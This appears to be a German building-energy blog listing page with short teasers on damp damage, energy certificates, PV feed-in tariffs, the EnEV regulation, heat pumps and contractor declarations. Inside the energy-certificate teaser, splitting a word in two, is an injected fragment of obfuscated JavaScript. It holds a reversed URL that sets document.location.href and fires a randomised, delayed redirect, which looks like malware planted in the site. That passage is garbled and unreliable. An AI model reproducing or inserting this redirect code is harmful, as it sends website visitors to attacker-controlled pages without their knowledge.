Feuchteschäden – Ursache finden, Gutachten erstellen, Schäden beseitigen

/
Feuchteschäden - Ursache finden, Gutachten erstellen, Schäden beseitigen Werden an Wänden im Haus feuchte Stellen entdeckt - äußerlich, dann steckt im Mauerwerk viel Feuchtigkeit. Doch die Quelle kann überall liegen. Zum Beispiel kann die Ursache der Feuchteschäden eine schadhafte Horizontalsperre sein oder auch nur ein Haarriss im Rohrleitungsnetz....

Der Energieausweis

/
Der Energieausweis Die Einführung des für jeden Immobilienverkäufer und Vermieter obligatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torischen Energieausweises hat für sehr viel Verunsicherung gesorgt. Dabei ist die Sache an und für sich weitaus weniger kompliziert als ursprünglich angenommen. Und schließlich hat der Energieausweis auch seine guten Seiten. So wird aus dem Gutachten zum Beispiel ersichtlich, wo sich im Rahmen von etwaigen Modernisierungsmaßnahmen Energiekosten sparen lassen.

PV – Vergütung für Solarstrom aus Photovoltaik – Anlagen

/
Vergütung für Solarstrom aus Photovoltaik - Anlagen ( PV ) bis Dezember 2016 - Neuregelungen ab 2017 Die aktuellen Vergütungssätze für Strom aus Photovoltaik - Anlagen ( PV ) sind seit einigen Monaten konstant. Die Vergütungssätze werden durch das EEG geregelt und monatlich angepasst.

Die aktuelle Energieeinsparverordnung – Die EnEV 2002 / 2004 / 2007 / 2009 / 2012 / 2013 / 2014 / 2016 … 2020 …

/
Energieeinsparverordnung - EnEV Derzeit gilt die Energieeinsparverordnung - EnEV 2014 / 2016. In Deutschland gibt es über 15 Millionen Wohngebäude. Davon sind etwa 13 Millionen Gebäude Einfamilien- und Zweifamilienhäuser. Über 80 % der Gebäude sind älter als 25 Jahre und besitzen teilweise ein entsprechend hohes Sanierungspotential und daher so auch einen hohen Jahresheizwärmebedarf.

Wie hoch sind Jahresarbeitszahl, Stromverbrauch und Preis einer Erdwärmepumpe?

/
Bei einer Erdwärmeheizung entzieht die Wärmepumpe der Erde (= Sole) Wärme, um diese letztendlich an das Medium Wasser abzugeben: eine Sole-Wasser-Wärmepumpe. Entscheidende Kenndaten zur Bewertung der Erdwärmepumpe sind die Jahresarbeitszahl, die Investitionskosten / Preis sowie der Stromverbrauch und die Stromkosten des aktuellen Wärmepumpentarifs.

Die Unternehmererklärung als Nachweis bei Baumaßnahmen nach EnEV 2014 / 2016

/
Die EnEV verpflichtet die Unternehmen eine Unternehmererklärung bei Sanierung des Wohngebäudes auszustellen. Diese bescheinigt unter anderem, dass die energetischen Anforderungen im Rahmen der Dämmung, der Erneuerung der Heizung, der Dachneueindeckung etc. eingehalten werden.